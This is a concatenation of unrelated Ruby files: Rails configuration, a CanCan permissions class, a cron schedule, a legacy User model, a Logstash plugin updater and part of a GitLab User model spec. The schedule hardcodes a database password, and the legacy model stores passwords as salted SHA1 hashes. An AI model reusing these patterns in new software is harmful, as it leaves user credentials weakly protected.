# settings configure the location and method used for the link.
#
# This setting changes the path where the link points to. If it's
# a string, the strings is used as the path. If it's a Symbol, we
# will call the method to return the path.
#
# Default:
config.logout_link_path = :destroy_admin_session_path
# This setting changes the http method used when rendering the
# link. For example :get, :delete, :put, etc..
#
# Default:
# config.logout_link_method = :get
# == Root
#
# Set the action to call for the root path. You can set different
# roots for each namespace.
#
# Default:
# config.root_to = 'dashboard#index'
# == Admin Comments
#
# This allows your users to comment on any resource registered with Active Admin.
#
# You can completely disable comments:
# config.comments = false
#
# You can change the name under which comments are registered:
# config.comments_registration_name = 'AdminComment'
#
# You can change the order for the comments and you can change the column
# to be used for ordering:
# config.comments_order = 'created_at ASC'
#
# You can disable the menu item for the comments index page:
# config.comments_menu = false
#
# You can customize the comment menu:
# config.comments_menu = { parent: 'Admin', priority: 1 }
# == Batch Actions
#
# Enable and disable Batch Actions
#
config.batch_actions = true
# == Controller Filters
#
# You can add before, after and around filters to all of your
# Active Admin resources and pages from here.
#
# config.before_action :do_something_awesome
# == Localize Date/Time Format
#
# Set the localize format to display dates and times.
# To understand how to localize your app with I18n, read more at
# https://github.com/svenfuchs/i18n/blob/master/lib%2Fi18n%2Fbackend%2Fbase.rb#L52
#
config.localize_format = :long
# == Setting a Favicon
#
# config.favicon = 'favicon.ico'
# == Meta Tags
#
# Add additional meta tags to the head element of active admin pages.
#
# Add tags to all pages logged in users see:
# config.meta_tags = { author: 'My Company' }
# By default, sign up/sign in/recover password pages are excluded
# from showing up in search engine results by adding a robots meta
# tag. You can reset the hash of meta tags included in logged out
# pages:
# config.meta_tags_for_logged_out_pages = {}
# == Removing Breadcrumbs
#
# Breadcrumbs are enabled by default. You can customize them for individual
# resources or you can disable them globally from here.
#
# config.breadcrumb = false
# == Create Another Checkbox
#
# Create another checkbox is disabled by default. You can customize it for individual
# resources or you can enable them globally from here.
#
# config.create_another = true
# == Register Stylesheets & Javascripts
#
# We recommend using the built in Active Admin layout and loading
# up your own stylesheets / javascripts to customize the look
# and feel.
#
# To load a stylesheet:
# config.register_stylesheet 'my_stylesheet.css'
#
# You can provide an options hash for more control, which is passed along to stylesheet_link_tag():
# config.register_stylesheet 'my_print_stylesheet.css', media: :print
#
# To load a javascript file:
# config.register_javascript 'my_javascript.js'
# == CSV options
#
# Set the CSV builder separator
# config.csv_options = { col_sep: ';' }
#
# Force the use of quotes
# config.csv_options = { force_quotes: true }
# == Menu System
#
# You can add a navigation menu to be used in your application, or configure a provided menu
#
# To change the default utility navigation to show a link to your website & a logout btn
#
# config.namespace :admin do |admin|
# admin.build_menu :utility_navigation do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# admin.add_logout_button_to_menu menu
# end
# end
#
# If you wanted to add a static menu item to the default menu provided:
#
# config.namespace :admin do |admin|
# admin.build_menu :default do |menu|
# menu.add label: "My Great Website", url: "http://www.mygreatwebsite.com", html_options: { target: :blank }
# end
# end
# == Download Links
#
# You can disable download links on resource listing pages,
# or customize the formats shown per namespace/globally
#
# To disable/customize for the :admin namespace:
#
# config.namespace :admin do |admin|
#
# # Disable the links entirely
# admin.download_links = false
#
# # Only show XML & PDF options
# admin.download_links = [:xml, :pdf]
#
# # Enable/disable the links based on block
# # (for example, with cancan)
# admin.download_links = proc { can?(:view_download_links) }
#
# end
# == Pagination
#
# Pagination is enabled by default for all resources.
# You can control the default per page count for all resources here.
#
# config.default_per_page = 30
#
# You can control the max per page count too.
#
# config.max_per_page = 10_000
# == Filters
#
# By default the index screen includes a "Filters" sidebar on the right
# hand side with a filter for each attribute of the registered model.
# You can enable or disable them for all resources here.
#
# config.filters = true
#
# By default the filters include associations in a select, which means
# that every record will be loaded for each association.
# You can enable or disable the inclusion
# of those filters by default here.
#
# config.include_default_association_filters = true
# == Footer
#
# By default, the footer shows the current Active Admin version. You can
# override the content of the footer here.
#
# config.footer = 'my custom footer text'
# == Sorting
#
# By default ActiveAdmin::OrderClause is used for sorting logic
# You can inherit it with own class and inject it for all resources
#
# config.order_clause = MyOrderClause
end
| 31.935374 | 116 | 0.701246 |
01801cbdb5a59f1cd08691615fb6d0f4a6fece91 | 4,391 | # frozen_string_literal: true
# rubocop:disable Metrics/ClassLength
class Ability
include CanCan::Ability
def initialize(user)
return if user.deactivated?
can :use_back_office, :all
assign_agency_user_permissions(user)
assign_finance_user_permissions(user)
end
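# Illustrative checks (not part of the original class), using CanCan's standard query API;
# `user` and `registration` are placeholders for any User and WasteCarriersEngine::Registration:
#   ability = Ability.new(user)
#   ability.can?(:renew, registration)  # => true for the agency roles granted above
#   ability.can?(:charge_adjust, :all)  # => true only for finance_admin / finance_super users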
private
def assign_agency_user_permissions(user)
permissions_for_agency_user if agency_user?(user)
permissions_for_agency_user_with_refund if agency_user_with_refund?(user)
permissions_for_agency_super_user if agency_super_user?(user)
permissions_for_developer_user if developer?(user)
end
def assign_finance_user_permissions(user)
permissions_for_finance_user if finance_user?(user)
permissions_for_finance_admin_user if finance_admin_user?(user)
permissions_for_finance_super_user if finance_super_user?(user)
end
# Permissions for specific roles
def permissions_for_agency_user
# This covers everything mounted in the engine and used for the assisted digital journey, including WorldPay
can :update, WasteCarriersEngine::RenewingRegistration
can :create, WasteCarriersEngine::Registration
can :renew, :all
can :view_certificate, WasteCarriersEngine::Registration
can :resend_confirmation_email, WasteCarriersEngine::Registration
can :order_copy_cards, WasteCarriersEngine::Registration
can :edit, WasteCarriersEngine::Registration
can :revert_to_payment_summary, :all
can :transfer_registration, [WasteCarriersEngine::Registration, RegistrationTransferPresenter]
end
def permissions_for_agency_user_with_refund
permissions_for_agency_user
can :view_revoked_reasons, :all
can :cease, WasteCarriersEngine::Registration
can :revoke, WasteCarriersEngine::Registration
can :cancel, :all
can :refund, :all
can :record_cash_payment, :all
can :record_cheque_payment, :all
can :record_postal_order_payment, :all
can :view_payments, :all
can :review_convictions, :all
can :write_off_small, WasteCarriersEngine::FinanceDetails do |finance_details|
finance_details.zero_difference_balance <= write_off_agency_user_cap
end
can :reverse, WasteCarriersEngine::Payment do |payment|
payment.cash? || payment.postal_order? || payment.cheque?
end
end
def permissions_for_finance_user
can :view_certificate, WasteCarriersEngine::Registration
can :record_bank_transfer_payment, :all
can :view_payments, :all
can :reverse, WasteCarriersEngine::Payment, &:bank_transfer?
end
def permissions_for_finance_admin_user
can :charge_adjust, :all
can :write_off_large, WasteCarriersEngine::FinanceDetails
can :view_certificate, WasteCarriersEngine::Registration
can :record_worldpay_missed_payment, :all
can :view_payments, :all
can :reverse, WasteCarriersEngine::Payment do |payment|
payment.worldpay? || payment.worldpay_missed?
end
end
def permissions_for_agency_super_user
permissions_for_agency_user_with_refund
can :manage_back_office_users, :all
# rubocop:disable Style/SymbolProc
can :modify_user, User do |user|
user.in_agency_group?
end
# rubocop:enable Style/SymbolProc
end
def permissions_for_finance_super_user
permissions_for_finance_admin_user
can :manage_back_office_users, User
can :charge_adjust, :all
# rubocop:disable Style/SymbolProc
can :modify_user, User do |user|
user.in_finance_group?
end
# rubocop:enable Style/SymbolProc
end
def permissions_for_developer_user
permissions_for_agency_user
can :manage, WasteCarriersEngine::FeatureToggle
can :import_conviction_data, :all
end
# Checks to see if role matches
def agency_user?(user)
user.role == "agency"
end
def agency_user_with_refund?(user)
user.role == "agency_with_refund"
end
def finance_user?(user)
user.role == "finance"
end
def finance_admin_user?(user)
user.role == "finance_admin"
end
def agency_super_user?(user)
user.role == "agency_super"
end
def finance_super_user?(user)
user.role == "finance_super"
end
def developer?(user)
user.role == "developer"
end
def write_off_agency_user_cap
@_write_off_agency_user_cap ||= WasteCarriersBackOffice::Application.config.write_off_agency_user_cap.to_i
end
end
# rubocop:enable Metrics/ClassLength
| 27.44375 | 112 | 0.763607 |
ac92dd300096d285ecd81727706a729d9120cde9 | 206 | class CreateInspirations < ActiveRecord::Migration[6.1]
def change
create_table :inspirations do |t|
t.string :name
t.string :image
t.text :bio
t.timestamps
end
end
end
| 17.166667 | 55 | 0.645631 |
ff1f81127c400301137249c48006872a97f510e6 | 168 | set :environment, "development"
env "DB_USER", "teamtat"
env "DB_NAME", "teamtat_development"
env "DB_PASSWORD", "12345678"
every 1.day, at: '3:00 am' do
rake "backup:db"
end
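# A sketch of what `whenever --update-crontab` generates for the block above (the exact
# wrapper depends on whenever's job template and the application path):
#   0 3 * * * cd /path/to/app && RAILS_ENV=development bundle exec rake backup:db --silent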
| 18.666667 | 32 | 0.75 |
e9efda6741612435dda64d6dd38b0040d917c02c | 4,893 | # == Schema Information
# Schema version: 2008100601002
#
# Table name: users
#
# id :integer(4) not null, primary key
# login :string(255)
# crypted_password :string(40)
# salt :string(40)
# created_at :datetime
# updated_at :datetime
# remember_token :string(255)
# remember_token_expires_at :datetime
# is_admin :boolean(1)
# can_send_messages :boolean(1) default(TRUE)
# email_verification :string(255)
# email_verified :boolean(1)
#
require 'digest/sha1'
require 'mime/types'
class User < ActiveRecord::Base
has_one :profile, :dependent => :nullify
# Virtual attribute for the unencrypted password
attr_accessor :password, :email, :terms_of_service
attr_protected :is_admin, :can_send_messages
attr_immutable :id
validates_acceptance_of :terms_of_service, :on => :create
validates_confirmation_of :password, :if => :password_required?
validates_presence_of :login
validates_presence_of :password, :if => :password_required?
validates_presence_of :password_confirmation, :if => :password_required?
validates_length_of :password_confirmation, :if => :password_required?,:within => 4..40
validates_length_of :password, :within => 4..40, :if => :password_required?
validates_length_of :login, :within => 3..40
validates_uniqueness_of :login, :case_sensitive => false
validates_format_of :email, :with => /^([^@\s]{1}+)@((?:[-a-z0-9]+\.)+[a-z]{2,})$/i, :on => :create, :message=> I18n.t(:invalid_email_address_label)
before_save :encrypt_password
validates_less_reverse_captcha
def before_create
p = Profile.find_by_email @email
return true if p.blank?
errors.add(:email, I18n.t(:email_already_been_taken)) and return false unless p.user.blank?
end
def after_create
p = Profile.find_or_create_by_email @email
raise 'User found when should be nil' unless p.user.blank?
p.is_active=true
p.user_id = id
p.save
#AccountMailer.deliver_signup self.reload
end
def after_destroy
profile.update_attributes :is_active=>false
end
def f
profile.f
end
def can_mail? user
can_send_messages? && profile.is_active?
end
# Authenticates a user by their login name and unencrypted password.
# Returns the user or nil.
def self.authenticate(login, password)
u = find_by_login(login) # need to get the salt
u && u.authenticated?(password) ? u : nil
end
# Encrypts some data with the salt.
def self.encrypt(password, salt)
Digest::SHA1.hexdigest("--#{salt}--#{password}--")
end
# Encrypts the password with the user salt
def encrypt(password)
self.class.encrypt(password, salt)
end
def authenticated?(password)
crypted_password == encrypt(password)
end
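# Illustrative only (not part of the original model): how the salted-SHA1 pieces fit together.
#   u = User.find_by_login('jdoe')
#   User.encrypt('secret', u.salt) == u.crypted_password  # => true when the password matches
#   User.authenticate('jdoe', 'secret')                   # => u, or nil for a bad login/password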
def remember_me
self.remember_token_expires_at = 10.years.from_now
self.remember_token = UUID.random_create.to_s + '-' + UUID.random_create.to_s if self.remember_token.nil?
save false
end
def remember_token?
remember_token_expires_at && Time.now.utc < remember_token_expires_at
end
def forgot_password
@forgot = true
self.password = UUID.random_create.to_s[0,8]
self.password_confirmation = password
encrypt_password
save!
self.password
end
def change_password(current_password, new_password, confirm_password)
sp = User.encrypt(current_password, self.salt)
errors.add( :password, I18n.t(:password_supplied_incorrect)) and
return false unless sp == self.crypted_password
errors.add( :password, I18n.t(:new_password_does_not_match)) and
return false unless new_password == confirm_password
errors.add( :password, I18n.t(:new_password_may_not_be_blank)) and
return false if new_password.blank?
self.password = new_password
self.password_confirmation = confirm_password
self.salt = Digest::SHA1.hexdigest("--#{Time.now.to_s}--#{login}--")
self.crypted_password = encrypt(new_password)
save
end
def reset_password(new_password, confirm_password)
raise I18n.t(:new_password_does_not_match) unless new_password == confirm_password
raise I18n.t(:new_password_may_not_be_blank) if new_password.blank?
sp = User.encrypt(self.password, self.salt)
self.password = new_password
self.password_confirmation = confirm_password
self.salt = Digest::SHA1.hexdigest("--#{Time.now.to_s}--#{login}--")
self.crypted_password = encrypt(new_password)
save!
end
protected
# before filter
def encrypt_password
return if password.blank?
self.salt = Digest::SHA1.hexdigest("--#{Time.now.to_s}--#{login}--") if
new_record? || @forgot
self.crypted_password = encrypt(password)
end
def password_required?
crypted_password.blank? || !password.blank?
end
end
| 29.654545 | 150 | 0.700184 |
877fab5df52aff754cd48baec88cd58ccf1355f3 | 867 | module Form
class ClosedQuestion < ApplicationRecord
belongs_to :form
has_many :options, class_name: 'ClosedQuestionOption', dependent: :destroy,
foreign_key: 'question_id'
has_many :answers, class_name: 'ClosedQuestionAnswer', through: :options
validates :question, presence: true
validates :field_type, inclusion: %w[checkbox radio]
validates :required, inclusion: [true, false]
validates :position, presence: true, numericality: { only_integer: true }
validate :no_changes_allowed_on_present_responses
scope :required, (-> { where(required: true) })
def radio_question?
field_type == 'radio'
end
private
def no_changes_allowed_on_present_responses
return if !changed? || form.try(:responses).try(:empty?)
errors.add(:form, 'has any responses')
end
end
end
| 28.9 | 79 | 0.694348 |
acf2f195f51e65f834a9051da1f129c6ddb4a508 | 580 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "react-native-awesome-module"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://github.com/1appstudio/react-native-awesome-module.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm}"
s.dependency "React-Core"
end
| 29 | 118 | 0.601724 |
91b96026608f4afa33d66b0418309683784442fd | 763 | #!/usr/bin/env ruby
# Usage: count_verbs.rb <dict> <input>
#
# Count main verbs in input text.
#
# dict : dictionary of words with morphosyntactic tags
# input : input file on which to perform the verb count
#
# Example using morphosyntactic dictionary included with this repo:
#
# $ ./count_verbs.rb ../morphosyntax_dict.txt /path/to/input.txt
require "set"
abort "Usage: #$0 dict.txt text.txt" if ARGV.size != 2
dict, text = ARGV
verbs = Set.new
File.open(dict) do |f|
f.each_line do |line|
word, type = line.split(" ")
if type[0, 2] == "Gg"
verbs.add(word.downcase)
end
end
end
File.open(text) do |f|
f.each_line do |line|
count = line.split(" ").count { |word|
verbs.include?(word)
}
puts count
end
end
| 20.621622 | 67 | 0.650066 |
bf08bb65e56d91a49c8ba55740275d80fd8fd6d6 | 2,016 | require 'clamp'
require 'logstash/namespace'
require 'logstash/pluginmanager'
require 'logstash/pluginmanager/util'
require 'rubygems/installer'
require 'rubygems/uninstaller'
require 'jar-dependencies'
require 'jar_install_post_install_hook'
class LogStash::PluginManager::Update < Clamp::Command
parameter "[PLUGIN]", "Plugin name"
option "--version", "VERSION", "version of the plugin to install", :default => ">= 0"
option "--proxy", "PROXY", "Use HTTP proxy for remote operations"
def execute
::Gem.configuration.verbose = false
::Gem.configuration[:http_proxy] = proxy
if plugin.nil?
puts ("Updating all plugins")
else
puts ("Updating #{plugin} plugin")
end
specs = LogStash::PluginManager::Util.matching_specs(plugin).select{|spec| LogStash::PluginManager::Util.logstash_plugin?(spec) }
if specs.empty?
$stderr.puts ("No plugins found to update or trying to update a non logstash plugin.")
exit(99)
end
specs.each { |spec| update_gem(spec, version) }
end
def update_gem(spec, version)
unless gem_path = LogStash::PluginManager::Util.download_gem(spec.name, version)
$stderr.puts ("Plugin '#{spec.name}' does not exist remotely. Skipping.")
return nil
end
unless gem_meta = LogStash::PluginManager::Util.logstash_plugin?(gem_path)
$stderr.puts ("Invalid logstash plugin gem. skipping.")
return nil
end
unless Gem::Version.new(gem_meta.version) > Gem::Version.new(spec.version)
puts ("No newer version available for #{spec.name}. skipping.")
return nil
end
puts ("Updating #{spec.name} from version #{spec.version} to #{gem_meta.version}")
if LogStash::PluginManager::Util.installed?(spec.name)
::Gem.done_installing_hooks.clear
::Gem::Uninstaller.new(gem_meta.name, {}).uninstall
end
::Gem.configuration.verbose = false
::Gem.install(spec.name, version)
puts ("Update successful")
end
end # class Logstash::PluginManager
| 28.8 | 133 | 0.694444 |
e82e8c1a21d8ee3e5a27fc32c8a22678f90d0f40 | 152,139 | # frozen_string_literal: true
require 'spec_helper'
describe User do
include ProjectForksHelper
include TermsHelper
include ExclusiveLeaseHelpers
it_behaves_like 'having unique enum values'
describe 'modules' do
subject { described_class }
it { is_expected.to include_module(Gitlab::ConfigHelper) }
it { is_expected.to include_module(Referable) }
it { is_expected.to include_module(Sortable) }
it { is_expected.to include_module(TokenAuthenticatable) }
it { is_expected.to include_module(BlocksJsonSerialization) }
it { is_expected.to include_module(AsyncDeviseEmail) }
end
describe 'delegations' do
it { is_expected.to delegate_method(:path).to(:namespace).with_prefix }
it { is_expected.to delegate_method(:tab_width).to(:user_preference) }
it { is_expected.to delegate_method(:tab_width=).to(:user_preference).with_arguments(5) }
end
describe 'associations' do
it { is_expected.to have_one(:namespace) }
it { is_expected.to have_one(:status) }
it { is_expected.to have_one(:user_detail) }
it { is_expected.to have_one(:user_highest_role) }
it { is_expected.to have_many(:snippets).dependent(:destroy) }
it { is_expected.to have_many(:members) }
it { is_expected.to have_many(:project_members) }
it { is_expected.to have_many(:group_members) }
it { is_expected.to have_many(:groups) }
it { is_expected.to have_many(:keys).dependent(:destroy) }
it { is_expected.to have_many(:deploy_keys).dependent(:nullify) }
it { is_expected.to have_many(:events).dependent(:delete_all) }
it { is_expected.to have_many(:issues).dependent(:destroy) }
it { is_expected.to have_many(:notes).dependent(:destroy) }
it { is_expected.to have_many(:merge_requests).dependent(:destroy) }
it { is_expected.to have_many(:identities).dependent(:destroy) }
it { is_expected.to have_many(:spam_logs).dependent(:destroy) }
it { is_expected.to have_many(:todos) }
it { is_expected.to have_many(:award_emoji).dependent(:destroy) }
it { is_expected.to have_many(:triggers).dependent(:destroy) }
it { is_expected.to have_many(:builds).dependent(:nullify) }
it { is_expected.to have_many(:pipelines).dependent(:nullify) }
it { is_expected.to have_many(:chat_names).dependent(:destroy) }
it { is_expected.to have_many(:uploads) }
it { is_expected.to have_many(:reported_abuse_reports).dependent(:destroy).class_name('AbuseReport') }
it { is_expected.to have_many(:custom_attributes).class_name('UserCustomAttribute') }
it { is_expected.to have_many(:releases).dependent(:nullify) }
it { is_expected.to have_many(:metrics_users_starred_dashboards).inverse_of(:user) }
describe "#bio" do
it 'syncs bio with `user_details.bio` on create' do
user = create(:user, bio: 'my bio')
expect(user.bio).to eq(user.user_detail.bio)
end
context 'when `migrate_bio_to_user_details` feature flag is off' do
before do
stub_feature_flags(migrate_bio_to_user_details: false)
end
it 'does not sync bio with `user_details.bio`' do
user = create(:user, bio: 'my bio')
expect(user.bio).to eq('my bio')
expect(user.user_detail.bio).to eq('')
end
end
it 'syncs bio with `user_details.bio` on update' do
user = create(:user)
user.update!(bio: 'my bio')
expect(user.bio).to eq(user.user_detail.bio)
end
context 'when `user_details` association already exists' do
let(:user) { create(:user) }
before do
create(:user_detail, user: user)
end
it 'syncs bio with `user_details.bio`' do
user.update!(bio: 'my bio')
expect(user.bio).to eq(user.user_detail.bio)
end
it 'falls back to "" when nil is given' do
user.update!(bio: nil)
expect(user.bio).to eq(nil)
expect(user.user_detail.bio).to eq('')
end
# very unlikely scenario
it 'truncates long bio when syncing to user_details' do
invalid_bio = 'a' * 256
truncated_bio = 'a' * 255
user.bio = invalid_bio
user.save(validate: false)
expect(user.user_detail.bio).to eq(truncated_bio)
end
end
end
describe "#abuse_report" do
let(:current_user) { create(:user) }
let(:other_user) { create(:user) }
it { is_expected.to have_one(:abuse_report) }
it "refers to the abuse report whose user_id is the current user" do
abuse_report = create(:abuse_report, reporter: other_user, user: current_user)
expect(current_user.abuse_report).to eq(abuse_report)
end
it "does not refer to the abuse report whose reporter_id is the current user" do
create(:abuse_report, reporter: current_user, user: other_user)
expect(current_user.abuse_report).to be_nil
end
it "does not update the user_id of an abuse report when the user is updated" do
abuse_report = create(:abuse_report, reporter: current_user, user: other_user)
current_user.block
expect(abuse_report.reload.user).to eq(other_user)
end
end
describe '#group_members' do
it 'does not include group memberships for which user is a requester' do
user = create(:user)
group = create(:group, :public)
group.request_access(user)
expect(user.group_members).to be_empty
end
end
describe '#project_members' do
it 'does not include project memberships for which user is a requester' do
user = create(:user)
project = create(:project, :public)
project.request_access(user)
expect(user.project_members).to be_empty
end
end
end
describe 'Devise emails' do
let!(:user) { create(:user) }
describe 'behaviour' do
it 'sends emails asynchronously' do
expect do
user.update!(email: '[email protected]')
end.to have_enqueued_job.on_queue('mailers').exactly(:twice)
end
end
end
describe 'validations' do
describe 'password' do
let!(:user) { create(:user) }
before do
allow(Devise).to receive(:password_length).and_return(8..128)
allow(described_class).to receive(:password_length).and_return(10..130)
end
context 'length' do
it { is_expected.to validate_length_of(:password).is_at_least(10).is_at_most(130) }
end
context 'length validator' do
context 'for a short password' do
before do
user.password = user.password_confirmation = 'abc'
end
it 'does not run the default Devise password length validation' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).not_to include('is too short (minimum is 8 characters)')
end
it 'runs the custom password length validator' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).to include('is too short (minimum is 10 characters)')
end
end
context 'for a long password' do
before do
user.password = user.password_confirmation = 'a' * 140
end
it 'does not run the default Devise password length validation' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).not_to include('is too long (maximum is 128 characters)')
end
it 'runs the custom password length validator' do
expect(user).to be_invalid
expect(user.errors.full_messages.join).to include('is too long (maximum is 130 characters)')
end
end
end
end
describe 'name' do
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_length_of(:name).is_at_most(255) }
end
describe 'first name' do
it { is_expected.to validate_length_of(:first_name).is_at_most(127) }
end
describe 'last name' do
it { is_expected.to validate_length_of(:last_name).is_at_most(127) }
end
describe 'username' do
it 'validates presence' do
expect(subject).to validate_presence_of(:username)
end
it 'rejects blacklisted names' do
user = build(:user, username: 'dashboard')
expect(user).not_to be_valid
expect(user.errors.messages[:username]).to eq ['dashboard is a reserved name']
end
it 'allows child names' do
user = build(:user, username: 'avatar')
expect(user).to be_valid
end
it 'allows wildcard names' do
user = build(:user, username: 'blob')
expect(user).to be_valid
end
context 'when username is changed' do
let(:user) { build_stubbed(:user, username: 'old_path', namespace: build_stubbed(:namespace)) }
it 'validates move_dir is allowed for the namespace' do
expect(user.namespace).to receive(:any_project_has_container_registry_tags?).and_return(true)
user.username = 'new_path'
expect(user).to be_invalid
expect(user.errors.messages[:username].first).to eq(_('cannot be changed if a personal project has container registry tags.'))
end
end
context 'when the username is in use by another user' do
let(:username) { 'foo' }
let!(:other_user) { create(:user, username: username) }
it 'is invalid' do
user = build(:user, username: username)
expect(user).not_to be_valid
expect(user.errors.full_messages).to eq(['Username has already been taken'])
end
end
end
it 'has a DB-level NOT NULL constraint on projects_limit' do
user = create(:user)
expect(user.persisted?).to eq(true)
expect do
user.update_columns(projects_limit: nil)
end.to raise_error(ActiveRecord::StatementInvalid)
end
it { is_expected.to validate_presence_of(:projects_limit) }
it { is_expected.to validate_numericality_of(:projects_limit) }
it { is_expected.to allow_value(0).for(:projects_limit) }
it { is_expected.not_to allow_value(-1).for(:projects_limit) }
it { is_expected.not_to allow_value(Gitlab::Database::MAX_INT_VALUE + 1).for(:projects_limit) }
it { is_expected.to validate_length_of(:bio).is_at_most(255) }
it_behaves_like 'an object with email-formated attributes', :email do
subject { build(:user) }
end
it_behaves_like 'an object with RFC3696 compliant email-formated attributes', :public_email, :notification_email do
subject { create(:user).tap { |user| user.emails << build(:email, email: email_value, confirmed_at: Time.current) } }
end
describe '#commit_email' do
subject(:user) { create(:user) }
it 'defaults to the primary email' do
expect(user.email).to be_present
expect(user.commit_email).to eq(user.email)
end
it 'defaults to the primary email when the column in the database is null' do
user.update_column(:commit_email, nil)
found_user = described_class.find_by(id: user.id)
expect(found_user.commit_email).to eq(user.email)
end
it 'returns the private commit email when commit_email has _private' do
user.update_column(:commit_email, Gitlab::PrivateCommitEmail::TOKEN)
expect(user.commit_email).to eq(user.private_commit_email)
end
it 'can be set to a confirmed email' do
confirmed = create(:email, :confirmed, user: user)
user.commit_email = confirmed.email
expect(user).to be_valid
expect(user.commit_email).to eq(confirmed.email)
end
it 'can not be set to an unconfirmed email' do
unconfirmed = create(:email, user: user)
user.commit_email = unconfirmed.email
# This should set the commit_email attribute to the primary email
expect(user).to be_valid
expect(user.commit_email).to eq(user.email)
end
it 'can not be set to a non-existent email' do
user.commit_email = '[email protected]'
# This should set the commit_email attribute to the primary email
expect(user).to be_valid
expect(user.commit_email).to eq(user.email)
end
it 'can not be set to an invalid email, even if confirmed' do
confirmed = create(:email, :confirmed, :skip_validate, user: user, email: 'invalid')
user.commit_email = confirmed.email
expect(user).not_to be_valid
end
end
describe 'email' do
context 'when no signup domains whitelisted' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return([])
end
it 'accepts any email' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
end
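# Guard against catastrophic backtracking (ReDoS): the whitelist entry below is a
# pathological regex, so validation must still finish quickly for hostile input.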
context 'bad regex' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['([a-zA-Z0-9]+)+\.com'])
end
it 'does not hang on evil input' do
user = build(:user, email: 'user@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!.com')
expect do
Timeout.timeout(2.seconds) { user.valid? }
end.not_to raise_error
end
end
context 'when a signup domain is whitelisted and subdomains are allowed' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['example.com', '*.example.com'])
end
it 'accepts [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'accepts [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_invalid
end
end
context 'when a signup domain is whitelisted and subdomains are not allowed' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['example.com'])
end
it 'accepts [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_invalid
end
it 'rejects [email protected]' do
user = build(:user, email: "[email protected]")
expect(user).to be_invalid
end
it 'accepts [email protected] when added by another user' do
user = build(:user, email: "[email protected]", created_by_id: 1)
expect(user).to be_valid
end
end
context 'domain blacklist' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist_enabled?).and_return(true)
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist).and_return(['example.com'])
end
context 'bad regex' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist).and_return(['([a-zA-Z0-9]+)+\.com'])
end
it 'does not hang on evil input' do
user = build(:user, email: 'user@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!.com')
expect do
Timeout.timeout(2.seconds) { user.valid? }
end.not_to raise_error
end
end
context 'when a signup domain is blacklisted' do
it 'accepts [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
it 'accepts [email protected] when added by another user' do
user = build(:user, email: '[email protected]', created_by_id: 1)
expect(user).to be_valid
end
end
context 'when a signup domain is blacklisted but a wildcard subdomain is allowed' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_blacklist).and_return(['test.example.com'])
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['*.example.com'])
end
it 'gives priority to whitelist and allow [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
end
context 'with both lists containing a domain' do
before do
allow_any_instance_of(ApplicationSetting).to receive(:domain_whitelist).and_return(['test.com'])
end
it 'accepts [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
it 'rejects [email protected]' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
end
end
context 'email restrictions' do
context 'when email restriction is disabled' do
before do
stub_application_setting(email_restrictions_enabled: false)
stub_application_setting(email_restrictions: '\+')
end
it 'does accept the email address' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
end
context 'when email restrictions is enabled' do
before do
stub_application_setting(email_restrictions_enabled: true)
stub_application_setting(email_restrictions: '([\+]|\b(\w*gitlab.com\w*)\b)')
end
it 'does not accept email address with + characters' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
it 'does not accept email with a gitlab domain' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
end
it 'adds an error message when email is not accepted' do
user = build(:user, email: '[email protected]')
expect(user).not_to be_valid
expect(user.errors.messages[:email].first).to eq(_('is not allowed. Try again with a different email address, or contact your GitLab admin.'))
end
it 'does accept a valid email address' do
user = build(:user, email: '[email protected]')
expect(user).to be_valid
end
context 'when created_by_id is set' do
it 'does accept the email address' do
user = build(:user, email: '[email protected]', created_by_id: 1)
expect(user).to be_valid
end
end
end
end
context 'owns_notification_email' do
it 'accepts temp_oauth_email emails' do
user = build(:user, email: "[email protected]")
expect(user).to be_valid
end
it 'does not accept not verified emails' do
email = create(:email)
user = email.user
user.update(notification_email: email.email)
expect(user).to be_invalid
end
end
context 'owns_public_email' do
it 'accepts verified emails' do
email = create(:email, :confirmed, email: '[email protected]')
user = email.user
user.update(public_email: email.email)
expect(user).to be_valid
end
it 'does not accept not verified emails' do
email = create(:email)
user = email.user
user.update(public_email: email.email)
expect(user).to be_invalid
end
end
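# set_commit_email only persists addresses the user owns: the private commit email
# token and nil are kept as-is, while an unverified address is reset to nil.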
context 'set_commit_email' do
it 'keeps commit email when private commit email is being used' do
user = create(:user, commit_email: Gitlab::PrivateCommitEmail::TOKEN)
